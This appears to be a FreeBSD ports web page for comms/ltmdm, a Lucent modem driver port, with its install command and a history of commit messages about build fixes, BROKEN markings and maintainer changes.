There are 2 exceptions allowed to quiet hours by default: incoming phone calls arriving from an app supporting the new lock screen call capability, and alarms set by the user in the default designated alarm app. If the app is a lock screen call capable app, and the IncomingCall setting is set to TRUE, the background task will run and the notification will be delivered. Notifications from alarms set by the user in the default designated alarm app will be delivered during quiet hours.
Quiet hours is enabled by default from Midnight to 6 AM, while allowing incoming calls. Users may change those settings or disable quiet hours on the notifications tab in the apps section of Change PC Settings. Quiet hours is available on all systems.
Cancellation of idle tasks
In addition to background task resource constraints, the Windows background task infrastructure detects idle or hung background tasks. A background task is considered idle or hung if it has not utilized its minimum CPU or network resource quota within a minimum amount of time (which varies depending on the state of the system). If an idle or hung background task is detected, it's sent a cancel notification so that it can stop work and close. If the background task does not stop work and close within 5 seconds the app is considered unresponsive and the system terminates it.
In Windows 8.1, avoid getting your app terminated due to an idle or hung background task: always associate a cancellation handler so that it is cleanly cancelled. See details and code snippets in How to handle idle or hung background tasks.
Work cost hint for background task
Windows 8.1 provides a hint to background tasks about resource availability. When a background task is activated, it can use this hint to decide how much work to do. Three background resource states can be reported: Low, Medium, and High. To learn more see BackgroundWorkCost and BackgroundWorkCostValue.
PowerShell cmdlets for background tasks
Developers can use the new AppBackgroundTask powershell commands, and the new BackgroundTasksManager cmdlet designer module, to retrieve info on running background tasks. This can be very helpful when implementing and debugging background tasks. For more info see the PowerShell cmdlets for background tasks.
Alarm app support on the lock screen
[Get the Alarm notifications sample now.].
You schedule alarm notifications by creating toast notifications with the commands element. And you use the audio element to specify the alarm sound, which is played when the notification fires even if the system is muted.)
CoreDispatcher::ShouldYield method (2 overloads)—Queries whether the caller should yield if there are items in the task queue of the specified priority or higher.
CoreDispatcher::CurrentPriority property—Gets or sets the current priority of task that the CoreDispatcher handled most recently. When an app is processing work of a specific priority and higher-priority work comes in, set this property to bump up the priority of the current task so that ShouldYield gives more accurate results. | https://msdn.microsoft.com/en-us/library/windows/apps/bg182890.aspx | CC-MAIN-2015-18 | refinedweb | 3,853 | 54.83 |
Topics: Introducing the Python matplotlib and basemap packages.
We will be using some packages that are not part of the default Python installation. To check if your Python has them, type the following at the Python shell:
import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.basemap import Basemap
If there are no errors, then you already have these packages. If not, you will need them. The easiest way is to get the popular packages for scientific computing is to download anaconda distribution of Python. It will install a second copy of Python on your computer (you can still use the old). You can also install matplotlib and numpy separately.
basemap is an extra package for drawing geographic maps. It is not part of many installations and needs to be added. In the anaconda Python, if you type:
from mpl_toolkits.basemap import Basemapit will give you the exact command to download basemap. You can also download basemap directly:
conda install -c basemap
The downloads will take about 15-30 minutes, depending on the internet speed. You might want to start the downloads and go on to the next part of the lab (which does not depend on either).
While you are waiting for matplotlib to download, let's get some data to use for our mapping.
Many programs will export data in Comma-Separated-Values (CSV) format. This includes almost all of the specimen databases at the museum. We will focus on the Vertebrate Zoology databases since some (Ichthyology & Ornithology) include location information for many of their specimens and allow direct downloads from their webpages.
For today's lab, you will need a CSV file with at least 10 specimens for which location data has been stored (the LATITUDE and LONGITUDE columns). With that caveat in mind, choose specimens that would be useful for your thesis or interest you.
CSV files store tabular information in readable text files. The files downloaded above have information separated by commas (using tabs as delimiters is also common). Here is a sample line:
"DOT 84 FLUID 11383",Ceyx lepidus collectoris,Solomon Islands,New Georgia Group,Vella Lavella Island,Oula River camp,,,,07 47 30 S,156 37 30 E,Paul R. Sweet,7-May-04,,PRS-2672,,,"Tissue Fluid "
All lines are formatted similarly: they start with the catalog number, then idenfication of the specimen, followed by location information, when and who collected it, and sometimes other fields describing the specimen (e.g. sex, age, preparation) The first line of the file gives the entries in the order they occur in the rows. Here is the first line for ornithology records:
CATALOG NUMBER,IDENTIFICATION,COUNTRY,STATE,COUNTY,PRECISE LOCALITY,OCEAN,ISLAND GROUP,ISLAND,LATITUDE,LONGITUDE,COLLECTOR(S),COLLECTING DATE FROM,COLLECTING DATE TO,COLLECTORS NUMBER,SEX,AGE,PREPS
Python has a built-in module to manipulate CSV files. The basic commands are:
We will use the coordinates for the next part of the lab, so, let's store them in a list:
#Open the file: f = open("AMNH-Ornithology-Internet-Export.csv", "rU") #Using the dictionary reader to access by column names: reader = csv.DictReader(f) #Set up arrays to hold the information extracted from the csv file: latStrings = [] longStrings = [] ident = [] #Traverse the file by rows, filtering for those specimens with GIS data: for row in reader: if row['LATITUDE'] != '': ident.append(row['IDENTIFICATION']) latStrings.append(row['LATITUDE']) longStrings.append(row['LONGITUDE']) f.close() #Print out latStrings to make sure it is working: print latStrings
Today, we will use one small part of the matplotlib library. It is a very popular for presenting results in 2D plots to be used in papers and presentations. We will plot GIS coordinates that we extracted from the database. Over the next several weeks, we will use other features of matplotlib and the popular numerical analysis package numpy.
The basemap package of matplotlib allows you to customize maps and then plot them using the standard matplotlib library. Let's first draw some maps, using the build-in projections, and then add points to represent the GIS coordinates of the specimen information from the database.
The basemap package follows a familiar format: it stores information in an object and provides functions for manipulating that object. We have seen this before with the turtle objects or regular expression match objects. For basemap, the objects are maps (from the Basemap class). The Basemap functions include the ability to change projections, regions, borders, and colors.
To get started, let's draw a simple map of the world. It takes a bit for it to run (you will get a warning telling you this):
import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.basemap import Basemap m = Basemap() m.drawcoastlines() plt.show()To continue, close the map window.
To make the map more interesting, let's add some color. We can do this by using the fillcontinents() function:
m.fillcontinents(color='darkgreen',lake_color='darkblue')To also fill in the oceans:
m.drawmapboundary(fill_color='darkblue')
(Feel free to alter the colors to make a more attractive map.)
If you would like to use satelite data (NASA 'Blue Marble' imagery), there is a function, bluemarble()
from mpl_toolkits.basemap import Basemap import matplotlib.pyplot as plt m = Basemap() m.bluemarble() plt.show()As well as an option to show the map with shaded relief (shadedrelief()) and etopo relief (etopo()). Try these various `backgrounds' (see map background for more options).
There are also options to change the region of the map displayed as well as the projection. The function that constructs the map object has many, many options that control the region projected, the type of projection, and the resolution of coastlines and other features.
For example,
map = Basemap(projection='ortho',lat_0=45,lon_0=-100,resolution='l')sets up an orthographic map projection with perspective of satellite looking down at 50N, 100W. It uses low resolution coastlines.
Some common projections and useful parameters:
Some useful things to add to your map:
The goal of this lab is to plot the location data from the CSV file to a map. We'll first plot a single point, the location of New York City, and then move on to the specimen data.
The coordinates for New York City are: 40.7127 N, 74.0059 W. To use for this package, we use the following conversion:
x,y = m(-74,40) m.plot(x,y,'ro',markersize=10)The 'ro' is a matplotlib option to plot red circles and markersize controls how large the plotted point appears.
x, y = m(longs[i],lats[i])(remember that longitudes correspond to x-values and latitudes to y-values.)
m.plot(x,y,'ro',markersize=10)
For each lab, you should submit a lab report by the target date to: kstjohn AT amnh DOT org. The reports should be about a page for the first labs and contain the following:
Target Date: 29 February 2016
Title: Lab. | https://stjohn.github.io/teaching/amnh/lab5.html | CC-MAIN-2022-27 | refinedweb | 1,158 | 55.74 |
I that each format has its uses, but even if you’re in the “no XML ever” camp you still might want to read on, as the observations and techniques I discuss should be equally applicable to JSON data binding with Jackson (or similar tools).
In Part 1 I describe a simple usage pattern that pairs JAXB’s data binding capabilities with JPA. Of course the interactions between the two aren’t always so simple, so in Part 2 I’ll look at how to address a few of the complications you can expect to encounter.
On my current project, we’re building a suite of Java applications to manage the staging of materials in a manufacturing process. We decided to build “from the outside in” to facilitate user-facing demos after any given iteration. So in the first iteration we built some of the screens with hard-coded dummy data; then with each successive iteration we added more infrastructure and logic behind the screens.
To make early demos more interactive, we decided to create a “test console” for the central app. A person typing commands at the console can simulate the behavior of the “net yet implemented” parts of the system. The cost to build the console is modest thanks to tools like Antlr 4 that make command parsing simple, and we see long-term value in using the console for testing and diagnostics.
We reached a point where the system’s behavior needed to be driven by data from another app. The “other app” that’s responsible for creating and maintaining this data hasn’t been written and won’t be for some time, so we needed a way to load sample data through the console.
Essentially our task was to build (or leverage) a data loader. We settled on XML as a likely format for the file, and then rifled through the list of tools with which our team would generally be familiar.
DBUnit has data-loading capabilities (intended for setting up repeatable test conditions). It supports two different XML Schemas (“flat” and “full”), each of which is clearly table-oriented. It also provides for substitution variables, so we could build template files and allow the console input to set final values.
I harbor some reservations about using a unit testing tool in this way, but of the arrows in the team’s quiver it could be the closest fit. For better or worse, my first attempt to apply it was not successful (turns out I was looking at the wrong part of the DBUnit API) which got me thinking a little further outside the box.
We already had a way – namely Hibernate – to push data into our database; so when I phrased the problem in terms of “how to create entity instances from XML documents,” JAXB emerged as an obvious contender. I was pleased to discover that Java ships with a JAXB implementation, so I set to work trying it out.
Never having used JAXB, I started with a little research. Much of the material I found dealt with generating Java classes from an XML schema. This isn’t surprising – it’s a big part of what the tool can do – but in my case, I wanted to bind data to my existing Hibernate-mapped domain classes. And that leads to something that may be a bit more surprising: some of the most comprehensive tutorials I found didn’t seem to anticipate this usage. I think this is a good demonstration of the way that your starting assumptions about a tool can shape how you think about it and how you use it.
If you start by comparing JAXB with DOM, as several online resources do, then it may be natural to think of the output of an unmarshalling operation as a document tree that needs to be traversed and processed, perhaps copying relevant data to a parallel hierarchy of domain objects. The traversal and processing may be easier (at least conceptually) than it would with a DOM tree, but as a tradeoff you have to keep the two class hierarchies straight, which calls for careful naming conventions.
There are no doubt use cases where that is exactly what is necessary, but the tool is not limited to only that approach. If you instead start by comparing JAXB with Hibernate – as a means of loading data from an external source into your domain objects – then it is natural to ask “why can’t I use one set of domain objects for both?” At least some of the time, with a little caution, you can.
In these examples I’ll use the JAXB API directly. We only need to make a few simple calls to accomplish our task, so this is reasonably straightforward. It is worth noting that Spring does offer JAXB integration as well, and especially if you use Spring throughout your app, the configuration approach it offers may be preferable.
Suppose you have an EMPLOYEE table. Every employee has a unique numeric ID and a name. If you use annotations for your ORM mapping data, you might have a domain class like this:
@Entity
@Table(name=”EMPLOYEE”)
public class Employee {
@Id
@Column(name=”EMPLOYEE_ID”)
private Integer employeeId;
@Column(name=”FIRST_NAME”)
private String firstName;
@Column(name=”LAST_NAME”)
private String lastName;
// … getters and setters …
};
Now we want to let the user provide an Employee.xml data file. Supposing we don’t have a specific XML Schema with which we need to comply, we might as well see what JAXB’s default handling of the class would be. So, we’ll start with the minimal steps to “marshal” an Employee instance into an XML document. If we’re happy with how the resulting document looks, we’ll swap in the unmarshalling code; if not, we can look into customizing the mapping.
First we need a JAXBContext instance configured to work with our domain class(es).
JAXBContext jaxb = JAXBContext.newInstance(Employee.class);
As an aside, instead of passing the class object(s) to newInstance(), we could pass in the name(s) of the package(s) containing the classes, provided each package contains either a jaxb.index file that lists the classes to use or an ObjectFactory class with methods for creating instances of the domain classes (and/or JAXBElements that wrap them). This approach might be preferable if you need XML mappings for a large number of unrelated domain classes.
The JAXBContext has methods for creating marshallers (which create XML documents to represent objects) and unmarshallers (which instantiate objects and initialize them from the data in XML documents). We can check out the default mapping for our Employee class like this:
Employee employee = new Employee();
employee.setEmployeeId(37);
employee.setFirstName(“Dave”);
employee.setLastName(“Lister”);
Marshaller marshaller = jaxb.createMarshaller();
marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
marshaller.marshal(employee, System.out);
(The setProperty() call isn’t strictly necessary but makes the output much more human-readable.) If we try running this code, we’ll get an exception telling us that we haven’t identified a root element. To fix this we add the @XmlRootElement annotation to our Employee class.
@XmlRootElement
@Entity
@Table(name=”EMPLOYEE”)
public class Employee {
@Id
@Column(name=”EMPLOYEE_ID”)
private Integer employeeId;
@Column(name=”FIRST_NAME”)
private String firstName;
@Column(name=”LAST_NAME”)
private String lastName;
// … getters and setters …
};
By default, the marshaller will map every public bean property (getter/setter pair) and every public field; so if our Employee class has the getters and setters you’d expect, then our output should look something like this:
<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<employee>
<employeeId>37</employeeId>
<firstName>Dave</firstName>
<lastName>Lister</lastName>
</employee>
Note that the elements under will be in an arbitrary order. (In my tests it’s been alphabetical.) In this case that works out nicely, but if it didn’t we could force the order using the @XmlType annotation. The unmarshaller will, by default, take the elements in any order.
JAXB is happily ignorant of the JPA annotations, and Hibernate (or whatever JPA provider you might use) will disregard the JAXB annotations, so we can now load data from XML files into our database by simply asking JAXB to unmarshal the data from the files and passing the resulting objects to the JPA provider. The unmarshalling code would look like this:
JAXBContext jaxb = JAXBContext.newInstance(Employee.class);
Unmarshaller unmarshaller = jaxb.createUnmarshaller();
File xmlFile = /* … */;
Employee employee = unmarshaller.unmarshal(xmlFile);
By default if an element that represents one of the bean properties is omitted from the XML, that property simply isn’t set.
In theory, that’s about it. (Extra credit if you know the difference between theory and practice.) A couple annotations and maybe a dozen lines of code are enough to get you started. As an added benefit, you can see the relationships between all of your data’s representations (XML, database, and Java object) in a single annotated .java file.
The above example is simple and may cover a fair number of basic use cases; but most real data models include things like one-to-many relationships and composite keys, which add wrinkles you may or may not foresee. In Part 2 (slated for August 25, 2014) I will address some of the complications I have encountered and discuss reasonably simple options for addressing each of them.
– Mark Adelsberger, asktheteam@keyholesoftware.com
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) | http://www.codeproject.com/Articles/799267/JAXB-A-Newcomer-s-Perspective-Part | CC-MAIN-2015-48 | refinedweb | 1,577 | 50.36 |
My server result was not taking start and limit into consideration. It worked :). Thanks.
My server result was not taking start and limit into consideration. It worked :). Thanks.
According to the example
what I understand is in the json object, totalCount should be the total number of...
In the tool bars both in top and bottom the number of records etc are showing properly as shown below.I have currently 13 records. When the page is loaded i expect only 10 records will be displayed...
Hi I have the following snippet of code for grid. My data is coming in the same page but the top bar and bottom bar arrows are working fine. Pagination not working . All the data coming in the same...
Wow its working now after commenting that.::)
But I need that onChnage functionality. Is there any way to fetch the inputValue or manually setting the value for the radioGroup? In Extjs 3.x, I...
var MyRadioGroupId_Component= new Ext.form.RadioGroup({
renderTo:'MyRadioGroupId',
listeners: {change:function(obj, newValue, oldValue) {
onChangeOfRadio(newValue);
...
Hi,
Thanks for the suggestion. I could see the radiogroup on the page.
There is one more issue that I'm facing. I can select both the radio buttons in the radiogroup.
I thought I should be able to...
Hi,
I just tried a simple RadioGroup which did not render in my page.
Here is the snippet:
var MyRadioGroupId_Component= new Ext.form.RadioGroup({
renderTo:'MyRadioGroupId',
...
Hi,
Recently I have moved to Extjs 4. I was using Ext.extend in 3.X.
Currently I have re written my like this:
Ext.onReady(function(){
Ext.define(Ext.my.Calendar, {
...
Hi, Thanks for the link. Where do I get the upgrade guide to 3.4? And we have the license for EXTJS. How do I download EXTJS 3.4?
Does EXTJS 3.3.3 fully support IE 9 or we need to upgrade to EXTJS 4? Kindly suggest.
Thanks Condor. Can I track this bug? I mean can I get the bug ID?
So currently TimeField in 3.2 version is missing all the validation messages except "required" message?
When allowBlank:false, then I'm getting "This field is required" message.
Thanks Condor.
But in the timefiled, in the drop down the values are '9:00 AM' to '6:00 PM', that means values are displayed accoring to minValue and maxValue but the error is not displayed. Also when I'm trying to...
Also when I'm trying to input any invalid data , its not showing me any error. After inputting invalid data when I click anywhere on the page the value from the timefield disappears. Am I doing...
Hi,
I am just trying to see the minText and maxTest error. Following is my snippet od code.
new Ext.form.TimeField({
minValue: '9:00 AM',
maxValue: '6:00 PM',
increment: 30...
Thanks.
Ext.get('someId').mask('Please Wait'); works fine.
On the mask I can see a box for the message. I do not want that.
How do I handle this?
Hi,
Can I use loadmask for a component which is not ext component.
For example I want to use the LoadMask for an html button. How do I do it?
var myMask = new Ext.LoadMask(Ext.getBody(),...
Will validateValue() will help me to keep the default validations provided by extjs also?
I also want when the disable the dates, in the popup calendar the dates will be disabled.
So some how it...
Hi,
If I want to disable dates starting from some date for e.g 02/15/03 to 02/03/03,
should I use mention all the dates in array from 02/15/03 to 02/03/03 and use in disabledates:?
The...
Hi,
Thanks. So does it mean that if I say
altFormats:'m/d/y|d/m/y|m/d/Y|d/m/Y|Y-d-m'
then i will not be allowed to enter date in format say m/d or d or n/j/y etc?
These are not the only two and I can't put a combo box also. I want to restrict on some formats for eg m/d, d etc and want to use any formats like 'd/m/y' etc
Hi ,
I want to restrict any other format other than m/d/y and d/m/y.
But if I use
parseDate : function(v) {
return (!v || v instanceof Date) ?
...
Hi,
altFormats:'m/d/y|d/m/y'
But it does not restrict the user to use 'm/d' or some other formats.
I thought if I use altFormats:'m/d/y|d/m/y' , then it will not allow any other formats to use...
I was actually trying
parseDate : function(v) {
return (!v || v instanceof Date) ?
v : (Date.parseDate(v, 'm/d/y')||Date.parseDate(v,... | https://www.sencha.com/forum/search.php?s=737e6c62156f0f4e21217007601ee85f&searchid=17884078 | CC-MAIN-2016-40 | refinedweb | 799 | 69.48 |
On Fri, Mar 18, 2011 at 3:34 PM, Michael Howitz <m...@gocept.com> wrote: > According to my findings, the provider-expression should work in Zope2 > PageTemplates (Products.PageTemplates) as it is registered in > Products.PageTemplates.Expressions.createZopeEngine.
Advertising
Sure. The provider expression should work, as Five takes care of registering it. What doesn't work is the expressiontype directive. There's only an imperative mode of setting up expression types inside Zope 2. >. That could be. Zope 3 page templates don't have any security context in Zope 2 as far as I know. So there's neither RestrictedPython nor AccessControl checks taking place. Once you start mixing them with Zope 2 page templates for example via macro calls it all gets weird. >. I'm not sure the existing expressiontype indirection is useful inside Zope 2. We have lived without it for all those years and until now nobody complained about it not being there. If we want to have pluggable namespaces in TAL, we can go directly for chameleon.zpt.interfaces.IExpressionTranslator instead. Hanno _______________________________________________ Zope-Dev maillist - Zope-Dev@zope.org ** No cross posts or HTML encoding! ** (Related lists - ) | https://www.mail-archive.com/zope-dev@zope.org/msg35746.html | CC-MAIN-2017-51 | refinedweb | 192 | 59.8 |
Opened 4 years ago
Closed 4 years ago
#7347 closed bug (fixed)
Existential data constructors should not be promoted
Description
Stefan Holdermans reports: I am almost sure this is a known issue, but I noticed some erroneous (?) interaction between datatype promotion and existential quantification. Consider the following program:
{-# LANGUAGE DataKinds #-} {-# LANGUAGE ExistentialQuantification #-} {-# LANGUAGE GADTs #-} {-# LANGUAGE KindSignatures #-} module Test where data K = forall a. T a -- promotion gives 'T :: * -> K data G :: K -> * where D :: G (T []) -- kind error!
I would expect the type checker to reject it, but GHC (version 7.6.1) compiles it happily
Change History (17)
comment:1 Changed 4 years ago by dreixel
comment:2 follow-up: ↓ 3 Changed 4 years ago by simonpj
- Cc dimitris@… sweirich@… eir@… added
If we promote existentials, people will want to pattern match on them to take them apart; we will need to deal with skolem-escape checks; etc. I don't know what the consequences are. I'd be happy to be told they are fine, but for now the implementation definitely isn't up to it, so better to exclude them now and allow them later.
Simon
comment:3 in reply to: ↑ 2 Changed 4 years ago by kosmikus
It seems that all that GHC 7.6.1 currently allows is to promote existentially quantified variables of kind *. Such constructors, if promoted, lead to simply kinded datatypes. No polymorphism, no existentials on that level. So why not keep allowing them? There's no danger of escaping variables even for type families, afaics.
The bug Stefan reports seems to be a missing check whether the type is used according to its inferred kind.
comment:4 follow-up: ↓ 5 Changed 4 years ago by simonpj
As far as I know, we don't currently have a mechanism for pattern matching on an existential data constructor at the type level. I'm pretty sure that 7.6.1 is broken in this respect.
comment:5 in reply to: ↑ 4 Changed 4 years ago by kosmikus
Well, this works in 7.6.1:
data Ex = forall a. MkEx a type family F (t :: Ex) :: * type instance F (MkEx Int) = Int type instance F (MkEx Bool) = String
And I don't see how it's dangerous or any different from this:
data Wrap = MkWrap Int f :: Wrap -> Int f (MkWrap 0) = 0 f (MkWrap 1) = 42
The point is still that if the kind of the promoted constructor is
MkEx :: * -> Ex
then there's no actual existential on the type level. We've just created a wrapper for values of kind *. I'm not arguing that we should promote constructors that would get polymorphic kinds of the form
MkStrange :: forall k. k -> Ex
AFAIK, Pedro makes use of promoted existentials in at least one of his generic universe encodings. So it'd be nice if they keep working, unless there's actually a problem with them.
comment:6 follow-up: ↓ 7 Changed 4 years ago by simonpj
Well this
type instance MkEx x = x
should give an existential escape error, but it doesn't. Instead it somehow fixes the kind to *.
You are arguing for this in general. If we promote a data constructor, such as Just, whose type is
Just :: forall a. a -> Maybe a
then we get poly-kinded type constructor
'Just :: forlal k. k -> 'Maybe k
You are arguing for some different type-promotion rule for existentials. Maybe, but I have never thought about that and I don't know what the details would be.
If you want something that isn't kind-polymorphic, you don't need an existential at all. Wha you want is something like
data kind Ex = MkEx *
a perfectly ordinary non-existential data type with an argument of kind *. Now, as Pedro points out in his ICFP paper we don't have a way to say that, but that is quite a separate matter; existntials are a total red herring. Maybe we should have
data Ex = MkEx STAR
where STAR is an uninhabited type whose promotion to the kind level is *.
comment:7 in reply to: ↑ 6 Changed 4 years ago by kosmikus
I'm sorry. I was confused by the fact that if I load a file containing
data Ex = forall a. MkEx a
into GHCi, I get this:
*Main> :kind 'MkEx 'MkEx :: * -> Ex
But I note now that this is because I didn't say PolyKinds in GHCi. Indeed, then I get:
*Main> :set -XPolyKinds *Main> :kind 'MkEx 'MkEx :: k -> Ex
So I thought GHC would not promote to an existential quantification on the type level, but it actually does. So yes, I was wrong, and this is indeed problematic.
comment:8 Changed 4 years ago by simonpj@…
commit 8019bc2cb7b2883bdf0da49ccdc52ecc9e2ad2fc
Author: Simon Peyton Jones <simonpj@microsoft.com> Date: Fri Oct 19 12:53:21 2012 +01). compiler/basicTypes/DataCon.lhs | 69 ++++++++++++++++++++------------------ compiler/iface/TcIface.lhs | 4 +- compiler/prelude/TysWiredIn.lhs | 6 ++-- compiler/types/TyCon.lhs | 2 +- 4 files changed, 42 insertions(+), 39 deletions(-)
comment:9 Changed 4 years ago by simonpj
- Status changed from new to merge
- Test Case set to polykinds/T7347
Please merge if it's easy to do so.
comment:10 Changed 4 years ago by simonpj
Also needs this:
commit 1152f9491517ca22ed796bfacbbfb7413dde1bcf Author: Simon Peyton Jones <simonpj@microsoft.com> Date: Fri Oct 19 20:29:06 2012 +0100 An accidentally-omitted part of commit 8019bc2c, about promoting data constructors >--------------------------------------------------------------- compiler/typecheck/TcHsType.lhs | 14 ++++++-------- 1 files changed, 6 insertions(+), 8 deletions(-) diff --git a/compiler/typecheck/TcHsType.lhs b/compiler/typecheck/TcHsType.lhs index bbfc673..60cf544 100644 --- a/compiler/typecheck/TcHsType.lhs +++ b/compiler/typecheck/TcHsType.lhs @@ -427,8 +427,8 @@ tc_hs_type hs_ty@(HsExplicitListTy _k tys) exp_kind ; checkExpectedKind hs_ty (mkPromotedListTy kind) exp_kind ; return (foldr (mk_cons kind) (mk_nil kind) taus) } where - mk_cons k a b = mkTyConApp (buildPromotedDataCon consDataCon) [k, a, b] - mk_nil k = mkTyConApp (buildPromotedDataCon nilDataCon) [k] + mk_cons k a b = mkTyConApp (promoteDataCon consDataCon) [k, a, b] + mk_nil k = mkTyConApp (promoteDataCon nilDataCon) [k] tc_hs_type hs_ty@(HsExplicitTupleTy _ tys) exp_kind = do { tks <- mapM tc_infer_lhs_type tys @@ -607,12 +607,10 @@ tcTyVar name -- Could be a tyvar, a tycon, or a datacon AGlobal (ATyCon tc) -> inst_tycon (mkTyConApp tc) (tyConKind tc) AGlobal (ADataCon dc) - | isPromotableType ty -> inst_tycon (mkTyConApp tc) (tyConKind tc) + | Just tc <- promoteDataCon_maybe dc + -> inst_tycon (mkTyConApp tc) (tyConKind tc) | otherwise -> failWithTc (quotes (ppr dc) <+> ptext (sLit "of type") - <+> quotes (ppr ty) <+> ptext (sLit "is not promotable")) - where - ty = dataConUserType dc - tc = buildPromotedDataCon dc + <+> quotes (ppr (dataConUserType dc)) <+> + ptext (sLit "is not promotable")) APromotionErr err -> promotionErr name err @@ -1465,7 +1463,7 @@ tc_kind_var_app name arg_kis ; unless data_kinds $ addErr (dataKindsErr name) ; case isPromotableTyCon tc of Just n | n == length arg_kis -> - return (mkTyConApp (buildPromotedTyCon tc) arg_kis) + return (mkTyConApp (promoteTyCon tc) arg_kis) Just _ -> tycon_err tc "is not fully applied" Nothing -> tycon_err tc "is not promotable" }
comment:11 Changed 4 years ago by goldfire
Stephanie and I thought about this issue this morning, and we believe that promoting existentials is sound.
Consider this:
{-# LANGUAGE ExistentialQuantification, PolyKinds, DataKinds #-} data Ex = forall a. MkEx a type family UnEx (ex :: Ex) :: k type instance UnEx (MkEx x) = x
This compiles in GHC 7.6.1, and it should.
First off, let's look at the type of 'MkEx, which is forall (k::BOX). k -> Ex. Now, let's look at the elaboration of UnEx in FC:
UnEx :: forall (k::BOX). Ex -> k axUnEx :: forall k. forall (x::k). (UnEx k (MkEx k x) ~ x)
So, the elaboration of UnEx simply contains a non-linear pattern in k. But, because k is a parameter to UnEx, the kind of x is not really escaping. As proof, here is an excerpt of the output from -ddump-tc:
TYPE CONSTRUCTORS Ex :: * data Ex No C type associated RecFlag NonRecursive = MkEx :: forall a. a -> Ex Stricts: _ FamilyInstance: none UnEx :: forall (k :: BOX). Ex -> k type family UnEx (k::BOX) (ex::Ex) :: k COERCION AXIOMS axiom Scratch.TFCo:R:UnExkMkEx (k :: BOX) (x :: k) :: UnEx k ('MkEx k x) ~# x
One comment above says that UnEx would default to a result kind of *. This would only happen in the absence of an explicit kind signature for the return kind; all un-annotated types involved in a type family default to *.
What's different about the type level is that there is no phase separation between kinds and types. Unpacking a type-level existential happens at compile time, so the type checker can incorporate what it learns in simplifying the call to UnEx.
comment:12 Changed 4 years ago by simonpj
What if I declare Ex like this?
data KEx :: * where MkKEx :: forall (a::k). Proxy a -> KEx
Now the kind variable k as well as the type variable a is existentially quantified, and NOW we will have to worry about existential escape, notwithstanding your comment about "no phase separation". Indeed I can't give a kind to UnKEx:
type family UnKEx :: KEx -> ???
So maybe what saves us here is that type families have user-specified kind signatures, and that in turn means we don't need to check for existential escape.
So I think I agree with your point, but I don't know how urgent/important it is, nor how hard it would be to implement. At its easiest it might mean just removing a restriction, but I'm not certain.
comment:13 Changed 4 years ago by goldfire
If you declare KEx as above, something weird happens when you promote (in 7.6.1): the type KEx gets promoted to a kind, but the kind-polymorphic data constructor MkKEx does not get promoted to a type. So, KEx becomes an uninhabited kind. This behavior is weird, but it seems not to violate any description of promotion: kind-polymorphic things are not promoted, and other (suitable) things are.
So, one cannot write an UnKEx type instance, and thus there is no problem.
I agree that this is far from urgent. But, if the checks you added to fix this bug added complexity, they could perhaps be removed. I believe the original implementation of naive promotion of existentials is the right one.
comment:14 Changed 4 years ago by igloo
- Resolution set to fixed
- Status changed from merge to closed
Merged as 4b380f192d1b3f7455e7c2bb9bf3ebe6c6b5e7ca and 29bbb9f538db07ecbc412879f357f16607b2ad65.
If another change is desirable, then I think it would be best to open a fresh ticket for it, so people looking at it don't have to trawl through so much history. Hence closing this one.
comment:15 Changed 4 years ago by simonpj@…
commit c0d846917846d303be48d9dc43fb047863ed14ea
Author: Simon Peyton Jones <simonpj@microsoft.com> Date: Wed Dec 5 11:07:38 2012 +0000 Allow existential data constructors to be promoted This reverts the change in Trac #7347, which prevented promotion of existential data constructors. Ones with constraints in their types, or kind polymorphism, still can't be promoted. compiler/basicTypes/DataCon.lhs | 8 +++++--- compiler/types/TyCon.lhs | 6 ++++-- 2 files changed, 9 insertions(+), 5 deletions(-)
comment:16 Changed 4 years ago by simonpj
- Status changed from closed to merge
After further discussion with Richard and Stephanie we decided to promote data constructors where
- The type constructor has no kind polymorphism; indeed has kind * -> .... -> *.
- The data constructor has no constraints (equality or otherwise) in its type
- The argument types of the data constructor are all promotable
This restores the 7.6.1 behaviour, and that turns out to be useful for Richard and/or Pedro.
I'm not sure why Stefan's original bug report is a bug. In his example
data K = forall a. T a -- promotion gives 'T :: forall k. k -> K data G :: K -> * where D :: G (T [])
the promoted kind of 'T is poly-kinded, and that makes its use in D fine. So currently it is accepted and I think we agree it should be.
The reminaing open issue concerns data types that have some promotable and some non-promotable constructors, but I'll open a new ticket for that.
Ian, I this this should merge smoothly onto 7.6.1, along with a doc patch that I'll commit shortly.
Simon
comment:17 Changed 4 years ago by igloo
- Status changed from merge to closed
I thought promotion of existentials was "ok" in the theory, though. So we're just going to forbid it entirely? | https://ghc.haskell.org/trac/ghc/ticket/7347 | CC-MAIN-2016-40 | refinedweb | 2,040 | 61.36 |
Type: Posts; User: nduriri
My cryting is vectorial, the pass word can go up to 1 million alphanumeric characters. The pass is written in a texte file. There is no way of getting the pass word. Im waiting for the french...
I want to write an application on crypting, if you have a small program on win32 please send me the copy
A console please of a code source under windows XP. please.
Thanks in advance
Thanks, do you have an example where I can create a window? Just to create a window with a screen where to type choices.
Please help me. Thanks in advance
You know long time ago I used to program in basic language wheen I was young and there was alot of goto instructions
Thanks
I'm not smart in graphic interface, can somebody help me to write a source code that creates menu browser/
here is my small programme
#include <istream>
#include <stdlib.h>
#include <string.h>... | http://forums.codeguru.com/search.php?s=216aa83a8995e843224efc0e1cc9248d&searchid=7384819 | CC-MAIN-2015-32 | refinedweb | 163 | 80.62 |
<aab10490@pop16.odn.net.jp>
Home page of the Linux driver :-
WWW:
To install the port: cd /usr/ports/comms/ltmdm/ && make install clean
cd /usr/ports/comms/ltmdm/ && make install clean
A package is not available for ports marked as: Forbidden / Broken / Ignore / Restricted
No options to configure
Number of commits found: 51
Mark BROKEN on 8: does not build after the TTY changes.
- Unbreak on -CURRENT
PR: ports/125863
Submitted by: WATANABE Kazuhiro <CQG00620@nifty.ne.jp>
Mark BROKEN on 8.0: does not compile
Drop maintainership, I don't have an ltmdm based modem any more.
Replace all INSTALL_DATA/INSTALL_SCRIPT and INSTALL_PROGRAM/STRIP=
hacks to install kernel loadable modules correctly on amd64 platforms
with the new INSTALL_KLD command.
All PORTREVISIONS have been bumped to show when the new version of
installing became available.
comms/ltmdm remove references to FreeBSD 4.x
1. remove references to FreeBSD 4.x
2. don't quote RESTRICTED
PR: ports/115404
Submitted by: David Yeske <dyeske@gmail.com>
Approved by: maintainer timeout
- Remove the DESTDIR modifications from individual ports as we have a new,
fully chrooted DESTDIR, which does not need such any more.
